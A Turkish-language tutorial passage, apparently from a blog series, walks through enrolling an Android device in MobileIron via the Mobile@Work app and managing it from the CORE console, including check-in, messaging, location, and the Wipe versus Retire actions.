Cihaz ekleme işlemleri için CORE’da yapılacaklar bu kadar. Eklemek istediğimiz mobil cihazımıza geçiyoruz. Ben bilgisayarımdan rahat rahat ekran görüntüsü almak için sanal bir tablet yüklediğim için operatör bilgisi gibi bazı veriler hatalı gelecektir.

clip_image028

Ben Android işletim sistemi yüklü bir cihaz ekleyeceğim için cihazdaki Google Play’den Mobile@Work’u yüklüyorum.

clip_image030

Mobil cihazdan Mobile@Work’u açıyoruz. Normalde kullanıcıların yapması gereken mail adresini yazması ve daha sonraki ekranda Active Directory kullanıcı adı ve şifresini girmesidir ama biz cloud’dan demo yaptığımız için Register With Server Url’ye tıklayıp diğer ekrana geçiyoruz.

clip_image032

Server Url’si girip sağ alttaki Next ile devam ediyoruz.

clip_image034

MobileIron’nun vaysayılanda gelen Gizlilik Politikasını kabul ediyoruz. İleriki makalelerimizde kurumumuz gizlilik politikasını nasıl kullanıcıların ekranlarında çıkarabiliriz göreceğiz. Continue ile devam ediyoruz.

clip_image036

Kullanıcı adımızı ve şifremizi girerek Sing In ile devam ediyoruz.

clip_image038

MobileIron’nun cihazımızda yönetici olması için gerekli yetkilerini Etkinleştir’e tıklayarak veriyoruz.

clip_image040

Mobil cihazımızı MobileIron’a ekleme işlemi gördüğünüz gibi birkaç adımda tamamlanıyor.

MobileIron üzerinde kullanıcılarımıza atanan politika ve uygulama olsaydı uygulanacak veya yüklenecekti. Şuan için herhangi bir ayar yapmadığımız için sadece varsayılan politikalar uygulandı.

MobileIron Merkezi Yönetim Konsolu CORE üzerinden cihazımızı kontrol edelim.

clip_image042

Devices tabında eklenen cihazımızı görüyoruz ve yanındaki ^ işaretine tıkladığımızda mobil cihazın özelliklerini, operatör bilgisini, uyguladığımız politikaları, cihazda yüklü olan uygulamaları, yaptığımız ayarları ve bunun gibi birçok detayı görmemiz mümkün.

clip_image044

Mobil Cihazın yanındaki tıklama alanına tıkladığımızda yukarıda Actions butonu aktif olacaktır.

Bu menüden bir mobil cihaz veya birden çok mobil cihaz için bazı aksiyonlar alabiliyoruz.

Örneğin Force Device Check In ile cihazın yeni hazırladığımız politikaları hızlıca almasını sağlayabiliyoruz.

clip_image046

Send Message ile SMS, Email, Data Channel veya Push Notification mesaj yollayabiliyoruz. Push Notification ile bir mesaj yollayalım ve iletişimi kontrol edelim.

clip_image048

Yine More Actions mesününde mobil cihazın lokasyonu gibi birçok aksiyon alabiliyoruz.

clip_image050

Android, IOS ve Windows işletim sistemine sahip mobil cihazlar içinde yapabileceğimi birçok aksiyon bulunuyor.

En alttaki 3 aksiyon ise çok dikkat etmemiz gereken aksiyonlar çünkü eğer cihazı Wipe ederseniz yani temizle derseniz cihazı fabrika ayarlarına geri getirmiş olursunuz ve kullanıcının şahsi ve kurumsal tüm bilgilerini cihazdan silmiş olursunuz. Eğer sadece cihazdaki kurumsal bilgilerin silinmesini ama kişisel veriler silinmemesini istiyorsanız Retire yapmalısınız.

Makale serimizin ilk bölümünün sonuna gelmiş bulunuyoruz. Serinin devam makalelerinde MobileIron’da mobil cihaz politikalarını nasıl oluşturabileceğimizden ve mobil veya web uygulamalarımızı Merkezi Yönetim Konsolu CORE’dan nasıl otomatik yükletebileceğimizden bahsedeceğiz.

Viewing all 105 articles
Browse latest View live